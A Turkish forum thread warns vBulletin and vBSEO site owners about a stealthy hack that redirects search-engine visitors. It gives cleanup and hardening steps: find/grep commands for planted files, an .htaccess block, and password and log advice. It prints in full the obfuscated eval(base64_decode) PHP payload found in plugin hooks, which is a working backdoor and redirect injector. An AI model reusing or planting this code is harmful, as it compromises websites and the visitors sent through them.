Dikkatli olmanızda fayda var

Son 2 haftadır dikkatli gözler bu konuda geçen tartışmaları izliyordur. Ingilizce bilmeyenler için bir açıklama yapayım. Şu anda birçok farklı site ( vBSEO kullanan veya kullanmayan ) çok enteresan bir hacklenme yöntemiyle karşı karşıya kalmakta ve işin en kötü tarafı site yetkililerinin hacklenme olayını neredeyse farketmesinin imkansız olması. Bundan dolayı aşağıdakileri çok dikkatli düzenli olarak kontrol etmenizi öneririm.

1. Google'a girerek bir konu isminizi aratın ve çıkan linke tıklayın. Eğer tıkladığınız link sizin sitenizden başka bir siteye yönlenmişse , hacklenmişiniz demektir. Eğer bu durum ile karşı karşıyaysanız sitenizde bulunan tüm global_start hook'larındaki pluginleri kontrol edin ve aşağıdaki gibi bir kod görürseniz hemen kodu temizleyin , vBSEO kullanıyorsanız vBSEO product dosyasını yeniden import edin.

Code:

eval(base64_decode('JHg9bWQ1KCc5aDdyJyk7aWYoaXNzZXQoJF9QT1NUWyR4XSkpZ XZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHh dKSkpOw0KaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApO2lua V9zZXQoJ2xvZ19lcnJvcnMnLDApOw0KJHI9IWVtcHR5KCRfU0V SVkVSWydIVFRQX1JFRkVSRVInXSkgPyAkX1NFUlZFUlsnSFRUU F9SRUZFUkVSJ10gOiBnZXRlbnYoJ0hUVFBfUkVGRVJFUicpOw0 KaWYoc3RybGVuKCRyKT4xMCkNCnsNCgkkaXA9JF9TRVJWRVJbJ 1JFTU9URV9BRERSJ107JGhuPUBnZXRob3N0YnlhZGRyKCRpcCk 7DQoJaWYoKHN0cnBvcygkaXAsJzY1LjU1LicpIT09MCkmJihzd HJwb3MoJGhuLCdtc25ib3QnKT09PWZhbHNlKSkNCgl7DQoJCSR zPWFycmF5KCdzZWFyY2gubGl2ZS5jb20nLCd3d3cuZ29vZ2xlJ ywnc2VhcmNoLnlhaG9vLmNvbScsJ3d3dy5iaW5nLmNvbScsJ3l hbmRleC5ydScsJ2JhaWR1LmNvbScpOw0KCQlmb3JlYWNoKCRzI GFzICRlKQ0KCQl7DQoJCQlpZigoc3RycG9zKCRyLCRlKSE9PWZ hbHNlKSYmKGVtcHR5KCRfQ09PS0lFWyd2YnNwJ10pKSkNCgkJC XsNCgkJCQkkaD1zdHJ0b3VwcGVyKHN1YnN0cihAbWQ1KCRfU0V SVkVSWydIVFRQX0hPU1QnXSksMCw4KSk7DQoJCQkJZGllKCI8a HRtbD48aGVhZD48L2hlYWQ+PGJvZHk+PHNjcmlwdCB0eXBlPVw idGV4dC9qYXZhc2NyaXB0XCI+dmFyIHZic3A9JyRoJzsiLnN0c l9yZXBsYWNlKCdcXCcsJ1xcXFwnLGd6aW5mbGF0ZShiYXNlNjR fZGVjb2RlKCdYVkxiY3Rvd0VQMFZtcG1PcExGRERNWUc0cnFkQ kpJMnZUZHArMks1SFNFRU9JRHRHQU51a1ArOVI2UXdtY3BlN2R telp5OFBVaHV4b0oNCk4xS3Nza1MybHVDMXZhYzF2Wlk3WlQ0W kdYYkZlb2NsMEF2Ukp2Q0RsWE5CZkZTdDJrSlpWbmdqRm1VU3B EK1ZLdzE2NzM1cTRza25UYW5CDQpUWmNqQVR4U0FiS3lxdGRwK 2R5MmFaUFdXcDZ6TldCOG1FdmlDa1dhaDhJYVNpWjcvTzdLYzh ZN3Z0TEZtZzhQU1U3Y1lSQUl2RGVTUmpyUQ0KMnU1MkYwM0U4Z DltdEFHTmR4OEd6M1E0cndyVVhxUUlhdE9ualdHUXVZcG15WGg vbHhqVlJ0RzdkcWVsWGxsUEFSc2N4QXl5Q2JUQW16OXcNClYxL 1c5a1hsT1NOVVFZbmZBTExybmlDejdtZjdnOHNVLzQvSC9pa2x lZ1B2SUpxQWVnT1o4Wld2RVIvOFEvUS9rRitBSEplMzVoRWxza 1J2DQp3OWlIMzU3TkJqd2dzSVV6N2ppYUhlOG5kb05USHd4bHc 1aXJaN3lSam8zbEFwQW9XNmJ6ekJOMFFpeC95dktEUER6UzZEL 2RnaG9vUXZjZA0KOGhNbzBLUkFOVXByRHYwQ3l4Umh4Y05SN3A yaTdaTG10TXcrdkdCOHFDYVNTaVZoeFQ0eDE0WnQyeUlHdXNRa EcxWTh1d3JtR0REVkFuanMNCk8xSlNJdnRrcHJCZURIZGZCSVJ kU05iUkgxNGlkVkh5b1IvWXl0SHdHeHZaNzVpVDZlMzA3Vjk1V FNsWDhOODJCOVhYVTdNTWZrZktjbEswDQpUdVVGZHRvN2hDeHR XVkI4NDMxdE1iVWNBUHdMZmhXOGNxNzRqY0kycnJjU2JYUzVXV 2tLSk4yNEVmNmlRZlNRblV4YUJMc0JqaSsvcncvRA0KU2VFcnI 3SURIQmJjRmY2cUVvc1hTM3A2c09xanBZejBNLzF3Z3VkTS92T 09aQVlGcGU2ODFvbGV1V1E1cXJmSkdVbEdpOFFNZmUxWXo5QlE nKSkpLiI8L3NjcmlwdD48L2JvZHk+PC9odG1sPiIpOw0KCQkJf Q0KCQl9DQoJfSANCn0'));

2. Serverınızı kontrol ederek sizden habersiz dosya serverınıza eklenip eklenmediğini kontrol edin. Bunu yapmak için ssh ile aşağıdaki kodu kullanabilirsiniz.

.htaccess dosyalarını bulur

Code:

find . -name .htaccess -exec grep -i httpd-php {} \;

şüpheli gif dosyalarını bulur

Code:

find . -regex '.*\.gif$' -exec grep phpspypass {} \;

3. Serverınız üzerinde chmod 777 durumunda olan klasör varsa içerisine aşağıdaki .htaccess dosyasından ekleyin ve bunu tüm chmod 777 durumundaki klasörlere uygulayın.

Code:

<Files ~ "\.(php\d*|cgi|pl|phtml)$">
order allow,deny
deny from all
</Files>

4. Var olan bütün şifrelerinizi değiştirin ve birden fazla sitede aynı şifreleri kullanmamaya çalışın. En azından sitenizde admin panele giriş yapabilen herkesin sadece sitenize özel şifre kullanması konusunda mutlaka gayret gösterin.

5. access_log larınızı mutlaka yedekleyin ki sizden talep edildiği taktirde inceleme için access_loglarınızı temin edebilirsiniz.

6. mysql_binary_log opsiyonunu bir süre için aktif duruma getirin ki sizden talep edildiği taktirde logları temin edersiniz.

7. Admincp güvenliğini arttırmak için .htaccess protection aktif hale getirip admincp klasör ismini değiştirmenizide tavsiye ederim.

Son olarak şunu eklemek istiyorum , hem vBSEO hem vBulletin takımı berabercene bu sorunun çözümünü bulabilmek için çalışmaktadır.

Evet bu konuyu takip ediyordum. Bende henüz böyle birşey olmadı ama uyarı için teşekkür ederim.

Tesekkürler aciklamalar icin Mert bey.

Dilerim çok can yakmadan kesin bir koruma bulunur...